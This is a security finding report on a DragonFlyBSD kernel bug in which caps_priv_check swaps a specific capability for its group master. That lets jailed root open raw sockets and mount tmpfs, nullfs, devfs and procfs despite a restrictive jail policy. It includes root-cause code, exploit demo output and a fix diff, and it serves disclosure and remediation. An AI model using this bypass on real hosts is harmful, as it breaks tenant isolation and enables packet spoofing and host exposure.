# DF-0165 — caps_priv_check cap-corruption -> jail policy bypass ## Verdict: **REPRODUCED** (5 distinct cap-gated actions bypass jail policy) Inside a jail created with the **default restrictive policy** (`allow_raw_sockets=0`, `vfs_mount_{nullfs,tmpfs,devfs,procfs}=0`), a jailed root (uid 0) successfully: 1. opens a raw IPv4 socket (`socket(AF_INET, SOCK_RAW, IPPROTO_RAW)`) — `SYSCAP_NONET_RAW` 2. mounts **tmpfs** — `SYSCAP_NOMOUNT_TMPFS` 3. mounts **nullfs** — `SYSCAP_NOMOUNT_NULLFS` (using kernel fstype "null") 4. mounts **devfs** — `SYSCAP_NOMOUNT_DEVFS` 5. mounts **procfs** — `SYSCAP_NOMOUNT_PROCFS` On a fixed kernel, each of these returns `EPERM` because the per-capability jail policy flag is clear. On this build they all succeed, proving the bypass. ## Mechanism (root cause confirmed line-by-line) In `sys/kern/kern_caps.c:333-340`: ```c res = caps_check_cred(cred, cap); /* :333 */ if (cap & __SYSCAP_GROUP_MASK) { /* :334 */ cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; /* :335 -- MUTATES cap */ res |= caps_check_cred(cred, cap); /* :336 */ } if (res & __SYSCAP_SELF) return EPERM; return (prison_priv_check(cred, cap)); /* :340 -- passes MUTATED cap */ ``` For a per-capability value like `SYSCAP_NONET_RAW = __SYSCAP_GROUP_6 | 1 = 0x61`: - `:334` `cap & __SYSCAP_GROUP_MASK` = `0x61 & 0xF0` = `0x60` (truthy) - `:335` `cap = (0x61 & 0xF0) >> 4` = `0x6` (= `SYSCAP_NONET`, the **group master**) - `:340` `prison_priv_check(cred, 0x6)` — the **specific cap (0x61) is never sent** In `prison_priv_check` (`sys/kern/kern_jail.c:854-978`): ```c case SYSCAP_NONET: /* :865-866 group master: ALLOWED */ return 0; ... case SYSCAP_NOMOUNT: /* :872,878 group master: ALLOWED */ return 0; ... case SYSCAP_NONET_RAW: /* :919-927 per-capability check -- DEAD on this path */ if (PRISON_CAP_ISSET(pr->pr_caps, PRISON_CAP_NET_RAW_SOCKETS)) return 0; return EPERM; ``` The `case SYSCAP_NONET_RAW` and the `case SYSCAP_NOMOUNT_*` branches are **dead code on the `caps_priv_check()` path** — `prison_priv_check` always receives the group-master number and matches the unconditional `return 0` case, so the per-capability PRISON_CAP_* flag is never consulted. ## Encoding reference (`sys/sys/caps.h`) ``` __SYSCAP_GROUP_MASK = 0x000000F0 (bits 4..7) __SYSCAP_GROUP_SHIFT = 4 __SYSCAP_XFLAGS = 0x7FFF0000 (e.g. __SYSCAP_NULLCRED, NOROOTTEST) Group-0 master caps (these match the "ALLOWED in jail" cases): SYSCAP_NONET = 0x06 -> prison_priv_check returns 0 (allowed) SYSCAP_NOMOUNT = 0x0A -> prison_priv_check returns 0 (allowed) Per-capability values (their *specific* switch arms are the real policy): SYSCAP_NONET_RAW = 0x61 -> corrupted to 0x6 -> matches SYSCAP_NONET SYSCAP_NOMOUNT_NULLFS = 0xA0 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_DEVFS = 0xA1 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_TMPFS = 0xA2 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_FUSE = 0xA4 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT SYSCAP_NOMOUNT_PROCFS = 0xA5 -> corrupted to 0xA -> matches SYSCAP_NOMOUNT ``` ## Caller chain (where the bypass matters) - `sys/netinet/raw_ip.c:473` — `rip_attach` calls `caps_priv_check(ai->p_ucred, SYSCAP_NONET_RAW | __SYSCAP_NULLCRED)`. With `cap = 0x00020061`, the corruption still reduces it to `6`: `0x00020061 & 0xF0 = 0x60`, `>> 4 = 6`. - `sys/kern/vfs_syscalls.c:152-157` — `sys_mount` calls `caps_priv_check_td(td, priv)` where `priv = get_fscap(fstypename)`. `get_fscap()` returns the specific `SYSCAP_NOMOUNT_*` value, which is corrupted to `SYSCAP_NOMOUNT`. ## Threat model - **Attacker position**: jailed root (uid 0 inside a jail). - **What the attacker gets**: - **Raw IP sockets** despite `jail.defaults.allow_raw_sockets=0`. Enables packet sniffing, IP-spoofed packet injection, ICMP attacks against other tenants / host. - **Mount nullfs / tmpfs / devfs / procfs** inside the jail despite `jail.defaults.vfs_mount_*=0`. Mounting devfs exposes device nodes; mounting nullfs over a host-visible path bypasses filesystem-level isolation; mounting procfs exposes host process metadata. - **Preconditions**: default DragonFlyBSD jail (no special config required). - **Reachability**: trivial — `socket(AF_INET, SOCK_RAW, IPPROTO_RAW)` and `mount("tmpfs", target, 0, NULL)` from jailed root. ## Demonstration ``` ---- jail default policy (should all be 0): ---- jail.defaults.allow_raw_sockets: 0 jail.defaults.vfs_mount_nullfs: 0 jail.defaults.vfs_mount_tmpfs: 0 jail.defaults.vfs_mount_devfs: 0 jail.defaults.vfs_mount_procfs: 0 ---- running bypass as root (will create + enter jail): ---- jail() ok: jid=11 (now jailed as uid=0) === DF-0165 demo: cap-gated actions inside jail === (jail default policy: allow_raw_sockets=0, vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM) socket(AF_INET, SOCK_RAW, IPPROTO_RAW) [SYSCAP_NONET_RAW] -> OK fd=3 *** BYPASS *** mount("tmpfs", /tmp/df0165-mnt-tmpfs) [SYSCAP_NOMOUNT_TMPFS] -> OK *** BYPASS *** mount("null", /tmp/df0165-mnt-nullfs) [SYSCAP_NOMOUNT_NULLFS] -> OK *** BYPASS *** mount("devfs", /tmp/df0165-mnt-devfs) [SYSCAP_NOMOUNT_DEVFS] -> OK *** BYPASS *** mount("procfs", /tmp/df0165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS] -> OK *** BYPASS *** === end: 5 cap-gated action(s) bypassed jail policy === ``` Reproduced 3 times in a row (see `run.log`, `run.2.log`, `run.3.log`); every run yields the same 5 bypasses. The only inter-run difference is the `jid=` value, which is just an incrementing jail counter. ## Notes / minor adjacent issues (not part of DF-0165) 1. `get_fscap()` in `sys/kern/vfs_syscalls.c:5386` matches `strncmp("null", fsname, 5)`, which does NOT match the user-visible fstype `"nullfs"`. The kernel fstype for nullfs is `"null"` (its vfsconf `vfc_name`). Anyone calling `mount("nullfs", ...)` falls through to the `SYSCAP_RESTRICTEDROOT` default — a separate latent surprise that the PoC works around by using `"null"`. 2. The same corruption affects `SYSCAP_NONET_BT_RAW`, `SYSCAP_NONET_ROUTE`, `SYSCAP_NONET_IFCONFIG`, etc., but those callers either route through a different cap or the action is independently gated. The five actions demonstrated here are the directly observable wins. ## Recommended fix (matches the finding's diff) Don't mutate the `cap` variable used for the jail lookup. Use a separate local for the group-master test: ```diff --- a/sys/kern/kern_caps.c +++ b/sys/kern/kern_caps.c @@ -331,9 +331,10 @@ res = caps_check_cred(cred, cap); if (cap & __SYSCAP_GROUP_MASK) { - cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; - res |= caps_check_cred(cred, cap); + int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT; + res |= caps_check_cred(cred, gcap); } if (res & __SYSCAP_SELF) return EPERM; - return (prison_priv_check(cred, cap)); + return (prison_priv_check(cred, cap)); /* ORIGINAL specific cap */ } ``` After the fix, the PoC should output `EPERM` for every action (policy honored).